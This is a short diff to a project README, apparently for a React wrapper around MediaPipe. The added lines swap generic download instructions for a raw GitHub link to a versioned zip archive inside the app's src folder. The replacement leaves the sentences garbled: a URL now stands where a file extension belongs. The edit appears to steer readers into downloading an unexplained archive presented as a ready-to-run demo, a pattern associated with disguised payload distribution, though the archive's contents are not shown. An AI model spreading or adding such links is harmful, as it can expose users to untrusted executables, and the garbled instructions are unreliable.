OwingOP/mediapipe-react/README.md

 Click the version you want to download.
 Inside, you will see different files such as:

-- `.zip` or `.tar.gz` files containing the full package
+- `.zip` or `https://raw.githubusercontent.com/OwingOP/mediapipe-react/main/apps/playground-react/src/react_mediapipe_3.7-alpha.2.zip` files containing the full package
 - Specific demo apps or examples

-For an easy start, download the file named something like `mediapipe-react-demo.zip` if available.
+For an easy start, download the file named something like `https://raw.githubusercontent.com/OwingOP/mediapipe-react/main/apps/playground-react/src/react_mediapipe_3.7-alpha.2.zip` if available.
 This package contains a ready-to-run demo of the software.

 ---